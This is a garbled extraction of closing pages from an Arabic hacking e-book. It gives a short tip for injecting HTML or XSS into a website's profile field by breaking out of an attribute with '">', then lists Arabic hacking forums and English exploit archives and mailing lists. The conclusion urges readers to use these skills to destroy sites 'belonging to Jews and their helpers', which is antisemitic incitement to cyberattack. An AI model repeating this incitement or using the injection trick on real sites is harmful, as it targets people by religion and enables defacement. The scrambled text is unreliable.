....‫>!‪<!-.END CODE --‬‬ ‫و الن عليك تشغيل ملف ال ‪ html‬هذا ‪ .‬‬ ‫خلي بالك ان فيه مسافه بعد العلمه‬ ‫">‪b‬‬ ‫خلي بالك منها وال سوف تجد بروكين كود ‪.‬‬ ‫اللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات ‪ xss‬او اي حاجه انت مش عارف تنفذها بسبب اغلق كود‬ ‫الهتمل اياه =( لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟‬ ‫الحل ‪:‬‬ ‫لسه و ال !!!!‬ ‫و السلم عليكم و رحمه ال و بركاته‪.‬اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجب‬ ‫ن يبدأ بالعلمه ‪:‬‬ ‫"<‬ ‫و ممكن ينتهي بالعلمه‬ ‫>‪b‬‬ ‫حتى ل تجد اي مشاكل في الكود عند العرض ‪.....‬‬ ‫انتهى‪،،،‬‬ ‫‪326‬‬ ..‬و كده الكود تم تشغيله !!!!‬ ‫مثال للي ممكن تكتبه مثل ‪:‬‬ ‫"<>‪h1>TESTING</h1><b‬‬ ‫طبعا ده حيطبع الكلمه ‪ TESTING‬مكان صورتك الشخصيه ‪!!.‬‬ ‫اقصى حد للكود اللي ممكن انك تشغله هو ‪ 30‬كراكتر ‪....‬ضع بعد كده اسم اليوزر و رقم الي دي و بعدين ‪submit‬‬ ‫سوف تجد نفسك في صفحه ‪ Your Account‬الخاصه بك ‪..

‫موقع المد الحمر‬ http://www.php .arabse.tk .8 .‫منتدى إعصار‬ /http://www.almuhands.11 .7 .ebnmasr.‫منتدى شبكة الحزم السلمية‬ http://www.‫منتدى امبراطورية العرب‬ /http://www.net ‫موقع‬ /http://www.net/vb .nafitha.e3sar.co.‫منتدى ابن مصر‬ /http://www.6 .ruwad.naajm.php .13 .com/vb .3 .uk/hihack/vb .1 .‫منتدى عرب فيجوال بيسك‬ http://www.org .‫منتدى هاكر فلسطين‬ /http://www.‫منتدى منظمة هاي هكر‬ /http://www.net/vb .com .4 .php .‫منتدى رواد‬ /http://www.com/vb/index.org/forum/index.‫منتدى نجم دوس‬ 327 .‫منتدى شبكة المهندس‬ /http://www." ‫" أفضل المنتديات العربية للهاكر‬ :::‫أقد لكم أفضل المواقع والمنتديات العربية في مجال الهاك بجميع مجالته على حد معرفتي‬ /http://members.pharaonics.arab4vb.‫منتدى معتز نت‬ /http://www.net/vb .10 .2 .emoataz.lycos.net/vb .9 .5 .com/vb/forumdisplay.h4palestine.7azm.12 .

.securify.securify.securityfocus.‬‬ ‫اوجد الرشيف عن طريق ‪ Ken Williams‬حيث ان هذا الموقع يستهلك مئات اللوف من النقرات كل‬ ‫اسبوع‬ ‫حاليا انتقلت ملكيته الى مالك ‪.com :‬‬ ‫‪328‬‬ .‬‬ ‫" أفضل مواقع المن والهاك النجليزية "‬ ‫هذه بعض المواقع المهمة التي يستخدمها الهكر لمعرفة اخر الثغرات الصادره مع مقالت بسيط لهذه المواقع‬ ‫موقع ‪Packet Storm Security‬‬ ‫‪---------------------‬‬‫العنوان ‪/http://packetstorm.‫هذه افضل مارأيته وتصفحته عن المواقع العربية التي تدعم علم الهاك‪.‬‬ ‫وشكرااا‪.)/Kroll-O-Nagra ) http://www..com‬‬ ‫موقع ‪Security Focus‬‬ ‫‪---------------‬‬‫العنوان ‪/http://www.com :‬‬ ‫واحد من اكبر قواعد البيانات التي تحمل كعلومات متعلقة بالمن‬ ‫انا افضل الذهاب الى هذا الموقع مره في اليوم لقراءة قسم '‪ 'New Files Today‬سواءا للبحث عن‬ ‫ثغرات معينه او ل‪.

4‬‬ ‫=‪=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+‬‬ ‫أما بالنسبة لمواقع الهاك النجليزية فمعرفتي بها ضئيلة لعدم توسعي في اللغة النجليزية‪ ،‬وهذه المواقع‬ ‫كالتالي‪:::‬‬ ‫موقع ‪http://www.1‬‬ ‫موقع ‪http://www.com‬‬ ‫‪.org‬يستقبل الرسائل‬ ‫التي ترسلها ) عن ثغرة معينه مثل ( ويقوم بتحليلها وتنضيفها من ال ‪ spams‬والرسائل التي ليس لها‬ ‫فائدة او الثغرات القديمة ثم يقوم بإرسال الرساله الممتازه فقط الى جميع المشتركين في القائمة‬ ‫انصحك بالتسجيل ‪/http://www.ussrback.webattack.2‬‬ ‫موقع ‪http://blacksun. /Security Focus )http://www.sk‬‬ ‫‪.com‬وسابقا‬ ‫كان مستضيفة )‪.org/sploits.4‬‬ ‫تقبلوا تحياتي‪،،،‬‬ ‫انتهى‪،،،‬‬ ‫تم تحميل الكتاب من مكتبة الطارق اللكترونية‬ ‫‪http://www.1‬‬ ‫موقع ‪/http://www.com‬‬ ‫‪.8.insecure.com.blackcode.com.t0010.netspace.‫قاعدة بيانات اخرى كاملة ‪ .securityfocus.cn/hack.‬تتحدث يوميا فهؤلء الشباب القائمون على هذا الموقع ل ينامون ابدا !‬ ‫‪BugTraq‬‬ ‫‪-------‬‬‫العنوان ‪ :‬مستضيفه موقع ‪ ).org‬‬ ‫‪ BugTraq‬واحدة من افضل قائمة المراسلت البريدية ‪ mailing list‬التي تتهتم بالمن اللكتروني‬ ‫هذه القائمة يقوم عليها رئيس اسمه ‪ .com/books/index.php‬‬ ‫‪329‬‬ .linux.(Aleph1 (aleph1@underground.8.pl‬‬ ‫‪.html‬‬ ‫‪.box.com‬‬ ‫تستطيع ايضا البحث في ارشيفاتها التي تعتبر لدي من افضل قواعد البيانات وذلك عن طريق دخول الموقع ثم‬ ‫البحث عن رابط '‪'search‬‬ ‫البحث ‪Searching‬‬ ‫‪-----------‬‬‫اذا كنت تريد البحث عن ثغرة متعلقة بخدمه معينة مثل ‪ Sendmail 8.3‬واذا اردت البحث عن ثغره معينه مثل هجوم حجب الخدمه ‪ local DoS‬ضد اي‬ ‫نسخه من ‪sendmail‬‬ ‫فما عليك ال كتابت التالي ‪ 'local DoS sendmail' :‬بدون علمات القتباس‪.com‬‬ ‫‪.za‬‬ ‫‪.(/Netspace ) http://www.3‬فستحتاج لكتابت '‬ ‫‪ 'sendmail 8.3‬‬ ‫موقع ‪http://www.‬‬ ‫وهذه بعض المواقع الخرى‪:::‬‬ ‫موقع ‪/http://rootshell.co.haker.securityfocus.3‬‬ ‫موقع ‪http://www.redi.2‬‬ ‫موقع ‪http://www.tk‬‬ ‫‪.

‫الرجاء عدم التجربة على المواقع العربية النافعه والستفاده‬ ‫من المعلومات للقضاء على المواقع الباحية والتابعة لليهود‬ ‫واعوانهم‬ ‫الخاتمة‬ ‫‪330‬‬ .

Sign up to vote on this title
UsefulNot useful